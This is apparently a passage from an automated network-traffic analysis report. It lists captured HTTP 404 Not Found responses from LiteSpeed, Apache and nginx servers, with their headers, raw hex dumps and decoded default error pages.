18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Wed, 06 Nov 2024 15:00:24 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close | Data Raw: 31 33 34 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                keep-alive: timeout=5, max=100
                content-type: text/html
                transfer-encoding: chunked
                content-encoding: gzip
                vary: Accept-Encoding
                date: Wed, 06 Nov 2024 15:00:26 GMT
                server: LiteSpeed
                x-turbo-charged-by: LiteSpeed
                connection: close
                Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 22 44 4d 55 cf 68 43 12 20 21 09 04 08 87 e3 86 d0 8e 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 da b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 a3 86 23 94 c0 c6 ef 67 ed 2d 3b f2 8b 5e 06 60 a2 38 2b 1e 06 ff ec 5d da fb 69 af 63 d8 04 c7 70 e4 fd 58 6e 39 4e 98 fa 0f 83 9b fe c4 2a fc 30 7d d7 fd 9f df d9 2f 5d bb 0a b3 f4 0b 10 3d ab dc e2 46 1f 4e 58 e6 b1 05 74 b1 8f 33 3b fa 3f d8 ee 6b 8f 3f 0b 68 e4 76 a7 67 26 ef 63 d7 03 5a b2 ea 2a 7b bf d9 cb 70 f1 ac c5 1f c7 df 64 1f a0 c8 b5 05 de 24 fd 0a 10 99 67 69 e9 de 87 a9 97 dd 08 fa aa 57 f6 d2 de f6 be 5a 5e 56 56 55 97 c0 3a 8e 7b b3 f8 82 9a 67 f3 0f 11 e4 5f fe 68 75 e1 5a 65 96 7e be 1e 1b 5e af ef 21 f9 99 09 ae 38 bb e8 d4 ae 2e 72 7d f9 6e 59 20 6f bf d7 7d 1f 28 6e 36 7c 95 16 b9 b4 0f f9 ed b1 d4 03 03 38 de 07 ea ba 42 6b e1 e6 ae 05 6c 06 c2 c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 c6 38 4d d0 ef a7 bd 8e 4d 2e ed 6d ec 4a ca 5b 8e ac 4f 84 fa 75 12 f7 61 e5 26 e5 0d 99 ef 48 c2 00 8e 7e 70 a5 30 7d 73 e5 31 fe 09 d0 ae ed 71 43 fd 05 c7 fb ac aa b2 e4 61 d0 ef f1 26 6c af af 2b 2c a1 e4 f5 e0 95 26 de d1 bf 55 43 6f ee 7b c7 b5 b3 c2 ea ed f7 30 00 21 c5 2d fa 20 f4 7e a3 57 8d 83 78 c4 b0 57 d6 f8 74 9f 87 20 6b dc e2 0a 5f ef d9 78 f0 32 bb 2e 3f 1f b6 40 9c 69 6e 3d e7 95 09 8c 26 89 31 f9 c6 e0 15 13 9f a3 f8 35 ae 7d 64 a8 5f 50 63 1d df d8 e6 bb a7 85 e9 25 66 7f 10 f3 e2 b0 ac ee 2f 69 a5 07 7c ea 0e b2 ba 2a 43 10 10 fa 8f 37 f6 7b 43 be 72 77 13 8c bf c3 eb aa ff 4d 5a c0 53 1c de b0 e5 c5 59 ef 5f 7d 64 7c bf c3 c5 d2 56 1c fa c0 c8 36 38 21 b8 c5 db f8 1b c9 af 37 7e f3 02 fa 8f 76 ba 24 5c 90 a3 3e 8b 61 7d 20 b8 0f 13 cb bf 35 e3 77 a1 3e 8d bd 97 a5 fd 29 07 24 a8 5b f9 fa 9c db be e4 c7 7d 16 3b 6f 52 f4 7a bc 96 f2 47 1d b4 59 e1 dc ef 01 46 22 90 a3 fa 3f f7 56 1c bf 27 f0 4b 52 81 a4 0e c0 3d 00 ba 02 59 e
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                keep-alive: timeout=5, max=100
                content-type: text/html
                transfer-encoding: chunked
                date: Wed, 06 Nov 2024 15:00:29 GMT
                server: LiteSpeed
                x-turbo-charged-by: LiteSpeed
                connection: close
                Data Raw: 32 37 37 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 06 Nov 2024 15:00:35 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 06 Nov 2024 15:00:37 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 06 Nov 2024 15:00:40 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 06 Nov 2024 15:00:42 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 06 Nov 2024 15:00:49 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 06 Nov 2024 15:00:51 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 